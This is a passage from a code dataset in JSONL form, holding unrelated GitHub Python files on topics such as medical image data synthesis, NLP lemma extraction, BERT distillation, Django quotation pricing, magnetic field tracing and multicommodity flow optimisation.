edge_radius_avg=edge['radius_avg'],\n edge_radius_min=edge['radius_min'],\n edge_radius_max=edge['radius_max'],\n edge_volume=edge['volume'],\n edge_surface_area=edge['surface_area'],\n edge_length=edge['length'],\n edge_tortuosity=edge['tortuosity']\n )\n print('{} has been processed!'.format(pulse_id + '_' + str(idx)))\n flag = 1\n break\n else:\n if tolerance > 10:\n print('{} does not work!!!'.format(pulse_id))\n break\n tolerance += 1\n return flag\n\n def data_synthesis(self, volume_num, radius_range, points_threshold):\n for pulse_id in self.pulse_ids:\n # read json\n json_file = os.path.join(self.source_dir, pulse_id+'_graph.json')\n with open(json_file, 'r') as f:\n graph = json.load(f)\n\n # read volume.nii.gz\n volume_file = os.path.join(self.source_dir,pulse_id+'_volume.nii.gz')\n volume = sitk.GetArrayFromImage(sitk.ReadImage(volume_file)) # uint8\n\n # random selection with a condition\n graph_edges = list(graph)\n random.shuffle(graph_edges)\n idx = 0\n while True:\n edge = graph[graph_edges.pop(0)]\n if edge['point_number'] >= points_threshold:\n if radius_range[0] <= edge['radius_avg'] <= radius_range[1]:\n flag = self.data_process(pulse_id, volume, edge, idx)\n if flag:\n idx += 1\n if idx >= volume_num:\n break\n\n\ndef main_parser(args=sys.argv[1:]):\n # Parser definition\n parser = argparse.ArgumentParser(description=\"Parses command.\")\n\n # Parser Options\n parser.add_argument(\"-source_dir\", default='raw_data/', help=\"Path of the raw data\")\n parser.add_argument(\"-target_dir\", default='synthesized_data/', help=\"Path of the synthesized data\")\n parser.add_argument(\"-volume_num\", type=int, help=\"Set number of synthesized disconnected volumes per subject\")\n parser.add_argument(\"-radius_min\", type=float, default=0.,\n help=\"Set the minimum radius of the edge to be disconnected\")\n parser.add_argument(\"-radius_max\", type=float, default=50.,\n help=\"Set the maximum radius of the edge to be disconnected\")\n parser.add_argument(\"-points_threshold\", type=int, default=10.,\n help=\"Edges with fewer points than this threshold will be filtered\")\n options = parser.parse_args(args)\n\n if options.radius_min >= options.radius_max:\n parser.error(\"--radius_min cannot be equal or lager than radius_max\")\n\n return options\n\n\nif __name__ == '__main__':\n \"\"\"\n A simple command to run this script:\n \n python Data_Synthesis.py -source_dir raw_data/ -target_dir synthesized_data/ -volume_num=2 -radius_min=1 -radius_max=15 -points_threshold=10\n \"\"\"\n options = main_parser(sys.argv[1:])\n if len(sys.argv) == 1:\n print(\"Invalid option(s) selected! To get help, execute script with -h flag.\")\n exit()\n \n if not os.path.exists(options.target_dir):\n os.mkdir(options.target_dir)\n\n generater = DataSyn(source_dir=options.source_dir,\n target_dir=options.target_dir)\n generater.data_synthesis(volume_num=options.volume_num,\n radius_range=[options.radius_min, options.radius_max],\n points_threshold=options.points_threshold)\n\n","repo_name":"M3DV/pulmonary-tree-repairing","sub_path":"data_synthesis.py","file_name":"data_synthesis.py","file_ext":"py","file_size_in_byte":9919,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"79"} +{"seq_id":"1036905697","text":"#!/usr/bin/env python\n\n\"\"\"\nExtract lemma (and optionally POS tag) from XML output by Stanford CoreNLP\n\nUsage:\n\n$ ./lemtag.py \"xml/*.xml\" lemtag\n\nwhere \"xml/*.xml\" is a quoted glob pattern and 'lemtag' is an existing \noutput dir. 
\n\"\"\"\n\nfrom lxml import etree\nfrom codecs import open\nimport logging as log\n\n\ndef lemtag(in_fname, out_fname, with_pos=False):\n log.info(\"writing to \" + out_fname)\n outf = open(out_fname, \"wb\", encoding=\"utf-8\")\n \n context = etree.iterparse(in_fname)\n for action, elem in context:\n if elem.tag == \"lemma\":\n outf.write(elem.text)\n elif elem.tag == \"POS\":\n if with_pos:\n outf.write(\"/\" + elem.text + \"\\n\")\n else:\n outf.write(\"\\n\")\n \nif __name__ == \"__main__\":\n from sys import argv\n from glob import glob\n from os.path import splitext, basename, join\n \n log.basicConfig(level=log.DEBUG)\n \n for in_fname in glob(argv[1]):\n out_fname = splitext(basename(in_fname))[0] + \".lemtag\"\n out_fname = join(argv[2], out_fname)\n lemtag(in_fname, out_fname)\n \n ","repo_name":"emsrc/idiscape","sub_path":"annot/lemtag.py","file_name":"lemtag.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10360779260","text":"names = [\"leticia\", \"joão\", \"pedro\"]\nfor n in names:\n \n if n == \"joão\":\n continue\n print(n)\nletras = \"abc\"\nfor n in letras:\n print(n)\nfor x in range(2,10,6):\n print(x)\nfor i in range(5):\n for j in range(6):\n print(i,j)\n\nfor l in range(1,11):\n print(\"------------------------\")\n for l2 in range(1,11):\n total = l*l2\n print(l, \"x\", l2, \"=\", total)\nfor l in range(0,101,2):\n print(l)\na= int(input(\"Informe um número: \"))\nb= int(input(\"Informe um número: \"))\nfor x in range(a,b):\n print(x)","repo_name":"oppsggbarros/Fabrica_de_Software","sub_path":"Para.py","file_name":"Para.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"33522335616","text":"\nimport json\nfrom typing import Any, Dict\n\n\nclass Transformer:\n def transform_json(self, raw_json: str) -> str:\n data = json.loads(raw_json)\n data = self.transform(data)\n output = json.dumps(data)\n return output\n\n def transform(self, data: Dict[str, Any]) -> Dict[str, Any]:\n return data\n\n\nclass BlocksTransformer(Transformer):\n def transform(self, data: Dict[str, Any]) -> Dict[str, Any]:\n data.pop(\"pubKeyBitmap\", None)\n\n # Remove \"epochStartShardsData.pendingMiniBlockHeaders.reserved\".\n for shard_data in data.get(\"epochStartShardsData\", []):\n for miniblock_header in shard_data.get(\"pendingMiniBlockHeaders\", []):\n miniblock_header.pop(\"reserved\", None)\n\n return data\n\n\nclass TokensTransformer(Transformer):\n def transform(self, data: Dict[str, Any]) -> Dict[str, Any]:\n for key in list(data.keys()):\n is_volatile_field_nft = key.startswith(\"nft_\")\n is_volatile_field_api = key.startswith(\"api_\")\n\n if is_volatile_field_nft or is_volatile_field_api:\n data.pop(key)\n\n return data\n\n\nclass LogsTransformer(Transformer):\n def transform(self, data: Dict[str, Any]) -> Dict[str, Any]:\n events = data.get(\"events\", []) or []\n\n for event in events:\n topics = event.get(\"topics\", []) or []\n # Replace NULL values with empty strings, since BigQuery does not support NULL values in arrays (mode = REPEATED).\n event[\"topics\"] = [topic if topic is not None else \"\" for topic in topics]\n\n # We've altered the data in-place.\n return 
data\n","repo_name":"multiversx/multiversx-etl","sub_path":"multiversxetl/transformers.py","file_name":"transformers.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15411590505","text":"# -*- coding : utf-8 -*-\n\n##///////////////////////////////////##\n## T H E L I G H T P I A N O ##\n##\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\##\n\n#import time\n#import RPi.GPIO as GP\n\n\ndef disp(something) : #Displays the notes to play on the LED matrix\n\n\tprint(\"Unavailable function at the moment\")\n\n\treturn\n\n\n\ndef screen_disp(something) : # Displays something on a black and white small LCD display\n\n\tprint(\"Unavailable function at the moment\")\n\n\treturn\n\n\n\ndef greetings() : #Displays a greeting signal when turning on the device (+ the console)\n\n\tlog = open('logo.tlp','r') # Console signal\n\tlogo = log.read()\n\tlogo = logo.split('')[0]\n\tprint(logo)\n\tlog.close()\n\n\tscreen_disp('THE LIGHT PIANO')\n\n\tdisp('Welcome') # LED Signal - Pause\n\t\n\tscreen_disp('WELCOME')\n\n\treturn\n\n\ndef see_you() : #Displays a good bye signal when turning the device off (+ the console)\n\n\tlog = open('logo.tlp','r') # Console signal\n\tlogo = log.read()\n\tlogo = logo.split('')[1]\n\tprint(logo)\n\tlog.close()\n\n\tscreen_disp('SEE YOU SOON')\n\n\tdisp('SeeYouSoon') # LED signal - Pause\n\n\tscreen_disp('THE LIGHT PIANO')\n\n\treturn\n\n\n\n","repo_name":"bporteboeuf/master-python","sub_path":"projetS3/save_02.11.2015/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38789503474","text":"\nwith open(r\"01\\data.txt\", 'r') as file:\n data = [int(line) for line in file]\n \nfor n in data:\n for x in data:\n if n + x == 2020:\n print(n*x)\n\nprint(\"mao\")\n","repo_name":"rod007vrr/AdventOfCode","sub_path":"01/day1A.py","file_name":"day1A.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33734081571","text":"\"\"\"\nThe recursion process is based on visiting each folder: in each folder we keep the files that match the desired pattern, and we go deeper into the folder structure by launching further calls to the function. The choice not to use the provided helper to detect whether an entry is a file or a folder was made after not being able to use it properly (and after seeing how easy it was to code my own check).\n\nTime and Space complexity\nIn terms of time complexity, the Master theorem gives little guidance here, since the size of n/b cannot be quantified (it corresponds to folder depth and need not be split proportionally). Using another approach, the time complexity depends on the number of calls that are launched, which in this case is determined by the depth and width of the folder tree, resulting in O(d*w). 
As for the space complexity, it is directly dependent on the number of file paths the function returns, hence O(f) for f found files.\n\"\"\"\nimport os\n\ndef find_files(suffix, path):\n \"\"\"\n Find all files beneath path with file name suffix.\n\n Note that a path may contain further subdirectories\n and those subdirectories may also contain further subdirectories.\n\n There is no limit to how deep the subdirectories can be.\n\n Args:\n suffix(str): suffix of the file name to be found\n path(str): path of the file system\n\n Returns:\n a list of paths\n \"\"\"\n if suffix == \"\":\n return []\n if len(os.listdir(path)) == 0:\n return []\n path_elements = os.listdir(path)\n path_files = [file for file in path_elements if file.endswith(\".\" + suffix)]\n path_folders = [file for file in path_elements if \".\" not in file]\n\n for folder in path_folders:\n path_files.extend(find_files(suffix = suffix, path = path + '/' + folder))\n\n return path_files\n\n\n# Testing preparation\npath_base = os.getcwd() + '/testdir'\n\n# Normal Cases:\nprint(find_files(suffix='c', path=path_base))\n# ['t1.c', 'a.c', 'a.c', 'b.c']\n\nprint(find_files(suffix='h', path=path_base))\n# ['t1.h', 'a.h', 'a.h', 'b.h']\n\nprint(find_files(suffix='z', path=path_base))\n# []\n\n# Edge Cases:\nprint(find_files(suffix='', path=path_base))\n# []\n","repo_name":"Shuniy/Codes","sub_path":"P/P1/FileRecursion.py","file_name":"FileRecursion.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"30428063593","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport dipole # https://github.com/klaundal/dipole\nimport displacement_field\nfrom pysymmetry.visualization import polarsubplot\nfrom mapping import trace_from_south_to_north\n\nRE = 6371.2e3\nd2r = np.pi / 180\n\n\n\n# MAKE MAGNETIC FIELD FUNCTIONS:\nget_main_dipole = lambda x: np.vstack(dipole.generic_dipole_field(x.T, np.array([0, 0, -30000e-9]), r0 = np.array([0, 0, 0]))).T\n\ndef get_B(x):\n main_dipole = get_main_dipole(x)\n\n # set up a perturbation field in the longitudinal direction, with an amplitude defined as a 2D gaussian:\n r0 = 5 * RE * 1e-3 # distance to the 2D gaussian in the z = 0 plane\n sig_r = 4 * RE * 1e-3 # sigma of the 2D gaussian in the radial direction in z = 0 plane\n sig_Z = 1 * RE * 1e-3 # sigma of 2D gaussian in Z direction\n A = 50e-9 # amplitude at r = r0, z = 0\n\n xx, yy, zz = x\n rr = np.sqrt(xx**2 + yy**2)\n gaussian = A * np.exp(- ((rr - r0)**2/(2 * sig_r**2) + zz**2 / (2 * sig_Z**2)) )\n theta = np.arctan2(yy, xx)\n Bx = -np.sin(theta) * gaussian\n By = np.cos(theta) * gaussian\n\n perturbation = np.zeros_like(main_dipole)\n perturbation[:, 0] = Bx\n perturbation[:, 1] = By\n B = main_dipole + perturbation\n return B\n\n\nweimer = pd.read_csv('weimer.txt', sep = ' ', skipinitialspace=True, comment = '#', names = ['mlat', 'mlt', 'R_E', 'phi'])\nweimer.phi = weimer.phi#*1e3\n#weimer = pd.read_csv('pot_Anders_Ohma_082219_1_t300.csv', sep = ',', skipinitialspace=True, comment = '#', names = ['mlat', 'mlt', 'R_E', 'phi'])\n\nV = np.vstack(( weimer[weimer.mlat > 0].phi.values, weimer[weimer.mlat < 0].phi.values)) * 1e-3\nlat = np.abs(np.vstack((weimer[weimer.mlat > 0].mlat.values, weimer[weimer.mlat < 0].mlat.values)))\nlon = np.abs(np.vstack((weimer[weimer.mlat > 0].mlt .values, weimer[weimer.mlat < 0].mlt .values))) * 15 \ndisplacement = displacement_field.Displacement_field(V, lat, lon, theta0 = 40.01, Kmax = 20, Mmax = 15 , 
corotation_included = False, latlim = 80) \n\n\n\nfig, axes = plt.subplots(ncols = 2)\npp = polarsubplot.Polarsubplot(axes[0])\n\nxx, yy = np.meshgrid(np.linspace(-1, 1, 12), np.linspace(-1, 1, 12))\n#yy = np.linspace(-1, 1, 12)\n#xx = np.zeros_like(yy)\niii = xx**2 + yy**2 < 1\nxx, yy = xx[iii], yy[iii]\nlat, mlt = pp._XYtomltMlat(xx, yy)\nlat = -lat\n\npp.scatter(lat, mlt)\nconj_lat_dip, conj_lon_dip = trace_from_south_to_north(get_main_dipole, lat, mlt*15, height = 0, t_bound = 130 * RE * 1e18)\npp.scatter(conj_lat_dip, conj_lon_dip / 15, s = 3)\n\nprint('done dipole')\n\npp2 = polarsubplot.Polarsubplot(axes[1])\n\nconj_lat, conj_lon = trace_from_south_to_north(get_B, lat, mlt*15, height = 0, t_bound = 130 * RE * 1e32)\n\niii = conj_lat > 0\n\npp2.scatter(lat[iii], mlt[iii])\npp2.scatter(conj_lat[iii], conj_lon[iii] / 15, s = 3)\n#print('mapped from %s, %s to %s, %s' % (lats, lons, list(conj_lat), list(conj_lon)))\n\nplt.show()","repo_name":"klaundal/displacement_field","sub_path":"synthetic_test.py","file_name":"synthetic_test.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74745262015","text":"#! -*- coding: utf-8 -*-\n\"\"\"\n@Author: Gump\n@Create Time: 20230214\n@Info: main\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport pandas as pd\nimport tensorflow as tf\nfrom bert import tokenization\nfrom bert.modeling import BertConfig\n\nfrom processing import DataProcess, input_fn_builder\nfrom model import model_fn_builder\nfrom utils import serving_input_fn\n\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '3' # 配置显卡\n\nflags = tf.flags\nargs = flags.FLAGS\n\nflags.DEFINE_string(\n 'data_dir', '../data/', 'The input data dir. 
Should be tfrecoder file'\n)\nflags.DEFINE_string(\n 'output_dir', '../model_saved',\n 'The output dir where the teacher model checkpoints will be written'\n)\n\n# teacher config\nflags.DEFINE_string(\n 'teacher_bert_config_file', 'pretrained_models/Roberta-large/student_bert_config.json',\n 'The config json file for teacher model'\n)\n\nflags.DEFINE_string(\n 'teacher_init_checkpoint', 'pretrained_models/Roberta-large/bert_model.ckpt',\n 'init checkpoint for teacher model'\n)\n\n# student config\nflags.DEFINE_string(\n 'student_bert_config_file', None, 'The config json file for student model'\n)\nflags.DEFINE_string(\n 'student_init_checkpoint', None,\n 'init checkpoint for student model'\n)\nflags.DEFINE_float(\n 'temperature', 2.0, 'temperature for softmax'\n)\nflags.DEFINE_float(\n 'alpha_ce', 0.33, 'weight for cross entropy loss'\n)\nflags.DEFINE_float(\n 'alpha_kl', 0.33, 'weight for cross KL loss'\n)\nflags.DEFINE_float(\n 'alpha_cos', 0.33, 'weight for cosine loss'\n)\n\n# public flags\nflags.DEFINE_string(\n 'vocab_file', '../pretrained_models/Roberta-large/vocab.txt', 'BERT vocabulary file'\n)\nflags.DEFINE_integer(\n 'max_seq_length', 128, 'The maximum length of input sequence'\n)\nflags.DEFINE_bool(\n 'do_train', True, 'Whether to run training'\n)\nflags.DEFINE_bool(\n 'do_eval', True, 'Whether to run eval on dev data'\n)\nflags.DEFINE_bool(\n 'do_predict', True, 'Whether to run predict on predict data'\n)\nflags.DEFINE_bool(\n 'do_export', True, 'Whether to export model'\n)\nflags.DEFINE_string(\n 'export_dir', './', 'where to save .pb model file'\n)\nflags.DEFINE_string(\n 'training_mode', 'distill', 'select from [`training_teacher`, `distill`, `eval_student_model`, `export`]'\n)\n\nflags.DEFINE_integer(\n 'batch_size', 8, 'train batch size'\n)\nflags.DEFINE_float(\n 'learning_rate', 2e-5, 'The initial learning rate for adam'\n)\nflags.DEFINE_float(\n 'num_train_epochs', 3, 'Total number of training epochs'\n)\nflags.DEFINE_float(\n 'warmup_proportion', 0.1, 'Proportion of training to perform linear learning rate warmup for'\n)\nflags.DEFINE_integer(\n 'save_checkpoints_steps', 4000, 'how often to save model checkpoint'\n)\n\n\ndef main(_):\n tf.logging.set_verbosity(tf.logging.INFO)\n\n # 数据加载\n tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True)\n processor = DataProcess(tokenizer=tokenizer, args=args)\n\n num_train_steps, num_warmup_steps, examples = None, None, -1\n origin_train_file = os.path.join(args.data_dir, 'origin', 'train.csv')\n tf_record_file = os.path.join(args.data_dir, 'tf_record', 'train.tfrecord')\n save_checkpoints_steps = args.save_checkpoints_steps\n if args.do_train:\n examples = processor.read_file(origin_train_file)\n processor.write_tf_record_data(output_file=tf_record_file, examples=examples)\n\n tf.logging.info('####train data length#######', len(examples))\n num_train_steps = int(len(examples) / args.batch_size * args.num_train_epochs)\n save_checkpoints_steps = int(len(examples) / args.batch_size)\n num_warmup_steps = int(num_train_steps * args.warmup_proportion)\n\n # estimator配置\n sess_config = tf.ConfigProto(allow_soft_placement=True,\n log_device_placement=False)\n sess_config.gpu_options.allow_growth = True\n run_config = tf.estimator.RunConfig(model_dir=args.output_dir,\n save_checkpoints_steps=save_checkpoints_steps\n ).replace(session_config=sess_config)\n\n teacher_bert_config = BertConfig.from_json_file(args.teacher_bert_config_file)\n if args.student_bert_config_file is not None:\n student_bert_config 
= BertConfig.from_json_file(args.student_bert_config_file)\n else:\n student_bert_config = None\n model_fn = model_fn_builder(teacher_bert_config=teacher_bert_config,\n student_bert_config=student_bert_config,\n teacher_init_checkpoint=args.teacher_init_checkpoint,\n student_init_checkpoint=args.student_init_checkpoint)\n\n params = {'learning_rate': args.learning_rate, 'num_warmup_steps': num_warmup_steps,\n 'batch_size': args.batch_size, 'num_train_steps': num_train_steps,\n 'training_mode': args.training_mode, 'alpha_ce': args.alpha_ce, 'alpha_kl': args.alpha_kl,\n 'alpha_cos': args.alpha_cos, 'temperature': args.temperature}\n\n estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config, params=params)\n\n if args.do_train:\n tf.logging.info(\"***** Running training *****\")\n tf.logging.info(\" Num examples = %d\", len(examples))\n tf.logging.info(\" Batch size = %d\", args.batch_size)\n tf.logging.info(\" Num steps = %d\", num_train_steps)\n train_input_fn = input_fn_builder(input_file=tf_record_file, is_training=True, seq_length=args.max_seq_length)\n estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)\n\n if args.do_eval:\n dev_file = os.path.join(args.data_dir, 'origin', 'eval.csv')\n record_eval_file = os.path.join(args.data_dir, 'tf_record', 'eval.tfrecord')\n eval_examples = processor.read_file(dev_file)\n processor.write_tf_record_data(record_eval_file, eval_examples)\n eval_steps = int(len(eval_examples) // args.batch_size)\n\n tf.logging.info(\"***** Running training *****\")\n tf.logging.info(\" Num examples = %d\", len(eval_examples))\n tf.logging.info(\" Num steps = %d\", eval_steps)\n\n eval_input_fn = input_fn_builder(input_file=record_eval_file, is_training=False, seq_length=args.max_seq_length)\n result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps) # checkpoint_path=''\n tf.logging.info(\"eval precision: %.2f\", result['eval_accuracy'])\n tf.logging.info(\"teacher eval precision: %.2f\", result['teacher_accuracy']) # None for training teacher model\n tf.logging.info(\"eval loss: %.2f\", result['eval_loss'])\n\n if args.do_predict:\n dev_file = os.path.join(args.data_dir, 'origin', 'eval.csv')\n record_eval_file = os.path.join(args.data_dir, 'tf_record', 'eval.tfrecord')\n eval_examples = processor.read_file(dev_file)\n processor.write_tf_record_data(record_eval_file, eval_examples)\n eval_input_fn = input_fn_builder(input_file=record_eval_file, is_training=False, seq_length=args.max_seq_length)\n checkpoint = '../model_saved/student_model/model.ckpt-12000'\n result = estimator.predict(input_fn=eval_input_fn, checkpoint_path=checkpoint)\n pred_labels, pred_scores = [], []\n for res in result:\n probabilities = res['probabilities']\n prob_label = probabilities.argmax(0)\n prob_score = probabilities[prob_label]\n pred_labels.append(prob_label)\n pred_scores.append(prob_score)\n\n df = pd.read_csv(dev_file, sep='\\t')\n df['pred_labels'] = pred_labels\n df['pred_scores'] = pred_scores\n df.to_csv('test_pred.csv', encoding='utf_8_sig', index=False)\n\n # export model\n if args.do_export:\n # select best model\n dev_file = os.path.join(args.data_dir, 'origin', 'eval.csv')\n record_eval_file = os.path.join(args.data_dir, 'tf_record', 'eval.tfrecord')\n eval_examples = processor.read_file(dev_file)\n processor.write_tf_record_data(record_eval_file, eval_examples)\n eval_steps = int(len(eval_examples) // args.batch_size)\n eval_input_fn = input_fn_builder(input_file=record_eval_file, is_training=False, 
seq_length=args.max_seq_length)\n best_checkpoint = (0.0, '')\n for file in os.listdir(args.output_dir):\n if file.endswith('index'):\n checkpoint = os.path.join(args.output_dir, file[:-6])\n result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps, checkpoint_path=checkpoint)\n tf.logging.info(\"eval precision: %.2f\", result['eval_accuracy'])\n tf.logging.info(\"teacher eval precision: %.2f\", result['teacher_accuracy'])\n tf.logging.info(\"eval loss: %.2f\", result['eval_loss'])\n if result['eval_accuracy'] > best_checkpoint[0]:\n best_checkpoint = (result['eval_accuracy'], checkpoint)\n\n tf.logging.info('save best checkpoint {}, eval score: {}'.format(best_checkpoint[1], best_checkpoint[0]))\n estimator.export_saved_model(args.export_dir, serving_input_fn, checkpoint_path=best_checkpoint[1])\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"gump1368/distiller","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17090860672","text":"#!/usr/bin/env python3\n\ndef rangify(numbers):\n if not numbers:\n return\n\n numbers = sorted(set(numbers))\n\n ranges = []\n start = numbers[0]\n\n try:\n for n in range(len(numbers)):\n if numbers[n+1] - numbers[n] == 1:\n continue\n end = numbers[n]\n ranges.append((start, end))\n start = numbers[n+1]\n\n except IndexError as e:\n end = numbers[-1]\n\n ranges.append((start, end))\n\n return ranges\n\n\ndef textify(ranges):\n texts = []\n for start, end in ranges:\n if start == end:\n texts.append(f\"{start}\")\n else:\n texts.append(f\"{start}-{end}\")\n return ','.join(texts)\n\n\nfor numbers in [[],\n [1],\n [1,1],\n [1,2],\n [2,1],\n [1,4,5,8],\n [1,2,4,8],\n [8,4,2,1],\n [1,2,3,3,3,5,8,8,8,13,13,13,14,15,16,17]]:\n if numbers:\n print(textify(rangify(numbers)))\n","repo_name":"rafalmierzwiak/yearn","sub_path":"code/textify_that_list.py","file_name":"textify_that_list.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17467272369","text":"import ctypes as ct\nimport torch\nimport ampere\n\ndef get_ptr(A: torch.Tensor) -> ct.c_void_p:\n if A is None:\n return None\n else:\n return ct.c_void_p(A.data.data_ptr())\n\nlib = ct.cdll.LoadLibrary('/home/fernand/sparse_learning/libsparse.so')\nlib.get_context.restype = ct.c_void_p\ncontext = ct.c_void_p(lib.get_context())\n\nA = torch.rand((128*128, 4096), dtype=torch.float16, device=torch.device(0))\nmask = ampere.create_mask(A)\nB = torch.rand((10240, 4096), dtype=torch.float16, device=torch.device(0))\nC = torch.zeros((128*128, 10240), dtype=torch.float16, device=torch.device(0))\n\nlib.sparse_matmul(context, get_ptr(A), get_ptr(B), get_ptr(C), A.shape[0], A.shape[1], B.shape[0], B.shape[1])\nprint((mask * A).matmul(B.T))\nprint(C)","repo_name":"fernand/sparse_learning","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25160779968","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom measurement.measures import Distance\n\nfrom .models import Quotation, Quartering\nfrom ..products.models import Composition, Rule\n\n# Dict for select arithmetic symbol\noperations = {Rule.Operation.SUM: '+', Rule.Operation.SUBTRACT: '-', Rule.Operation.MULTIPLY: 
'*'}\n\n\n# Trigger for post save in quotation\n@receiver(post_save, sender=Quotation)\ndef create_quartering_for_quotation(sender, instance, created, **kwargs):\n if created:\n quartering_list = []\n accumulated_price = 0\n # For each composition in the product's quotation\n for composition in Composition.objects.select_related('product').filter(product=instance.product):\n # Only if the material is mesurable, we need to calculate the mesures\n if composition.material.is_measurable:\n # Get measures in cm\n width = instance.width.cm\n high = instance.high.cm\n depth = instance.depth.cm\n # For each rule of the composition apply the operation in each attribute\n for rule in Rule.objects.select_related('composition').filter(composition=composition):\n operation = operations[rule.operation]\n rule_value = rule.value\n if rule.attribute == Rule.Attribute.WIDTH:\n width = eval(f'{width} {operation} {rule_value}')\n elif rule.attribute == Rule.Attribute.HIGH:\n high = eval(f'{high} {operation} {rule_value}')\n elif rule.attribute == Rule.Attribute.DEPTH:\n depth = eval(f'{depth} {operation} {rule_value}')\n # Validate position and assign 0 to the correct side, ej: doors doesn't have depth\n if composition.position == Composition.Position.SIDE:\n width = 0\n elif composition.position == Composition.Position.BASE:\n high = 0\n elif composition.position == Composition.Position.FRONT:\n depth = 0\n quartering = Quartering(\n width=Distance(cm=width),\n high=Distance(cm=high),\n depth=Distance(cm=depth),\n quotation=instance,\n composition=composition,\n quantity=composition.quantity\n )\n # The quartering price is pondered from the material price\n quartering.price = composition.material.price_per_unit * quartering.area\n accumulated_price += quartering.price * composition.quantity\n quartering_list.append(quartering)\n # Otherwise the quartering is just the material without measure\n else:\n price = composition.material.price\n quartering = Quartering(\n price=price,\n quotation=instance,\n composition=composition,\n quantity=composition.quantity\n )\n accumulated_price += price * composition.quantity\n quartering_list.append(quartering)\n Quartering.objects.bulk_create(quartering_list)\n instance.total_price = accumulated_price\n instance.save()\n","repo_name":"nlemarodriguez/despieces","sub_path":"apps/quotations/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3283693299","text":"import os\nfrom datetime import datetime\n\nfrom pyomo.environ import *\nimport pyomo.environ as pyo\nimport fileReading_PPNR\n\n'''\nNode balances = [[value for each comodity] for each node]\n\nedges = [[i,j] for each (i,j) in A ] (i,j) means that the edge goes from i to j\nEdge costs = dictionary, edge_cost[[i,j]]=val\nEdge capacities = dictionary, edge_capacities[[i,j]]=val\n'''\n\n\ndef linear_programming_MCMCF(nodes, edges, commodities, arc_cost, single_comodity_capacity, supply,mutual_capacities, start_nodes, end_nodes):\n #print(nodes_balances)\n #print(edge_costs)\n #print(edge_capacities)\n\n # Parametri\n model = ConcreteModel()\n model.commodities = commodities\n model.nodes_balances = supply\n model.edges = edges\n model.nodes = nodes\n model.edge_costs = arc_cost\n model.start_nodes=start_nodes\n model.end_nodes=end_nodes\n model.edge_capacities = single_comodity_capacity\n model.mutual_capacities=mutual_capacities\n\n # Variabile\n model.x = Var(model.edges, 
model.commodities, within=pyo.PositiveReals)\n\n # Funzione obiettivo\n def obj_rule(model):\n return (sum(model.x[edge, k]*model.edge_costs[(k,edge)] for edge in model.edges for k in commodities))\n\n model.obj = Objective(expr=obj_rule(model), sense=minimize)\n\n # Vincoli\n model.balances_constraint = ConstraintList()\n for k in model.commodities:\n for n in model.nodes:\n entering_edges = []\n exiting_edges = []\n for edge in model.edges:\n if start_nodes[edge] == n:\n exiting_edges.append(edge)\n if end_nodes[edge] == n:\n entering_edges.append(edge)\n model.balances_constraint.add(\n (sum(model.x[edge, k] for edge in entering_edges) - sum(\n model.x[edge, k] for edge in exiting_edges)) == model.nodes_balances[(k, n)])\n\n model.bundle_constraint = ConstraintList()\n for edge in edges:\n model.balances_constraint.add(\n sum(model.x[edge, k] for k in commodities) <= model.mutual_capacities[edge]\n )\n\n opt = pyo.SolverFactory('cplex')\n opt.options['lpmethod'] = 1\n opt.options['preprocessing presolve'] ='n'\n path = os.path.join('log', str(datetime.today().strftime('Resolution_%d-%m-%y_%H-%M-%S.log')))\n opt.solve(model, logfile=path)\n print_solution(model)\n\n\ndef print_solution(model):\n for k in model.commodities:\n print(\"--- \", k, \"---\")\n for edge in model.edges:\n print(model.start_nodes[edge], model.end_nodes[edge], k, \"-\", str(model.x[edge, k].value))\n\n for edge in model.edges:\n summ = sum(model.x[edge, k].value for k in model.commodities)\n difference =summ - model.mutual_capacities[edge]\n if (difference > 0.00001):\n print(\"UNFEASABLE EDGE: \", edge, \" VALUE \", summ - model.edge_capacities[0,edge])\n\n for k in model.commodities:\n for n in model.nodes:\n entering_edges = []\n exiting_edges = []\n for edge in model.edges:\n if start_nodes[edge] == n:\n exiting_edges.append(edge)\n if end_nodes[edge] == n:\n entering_edges.append(edge)\n difference 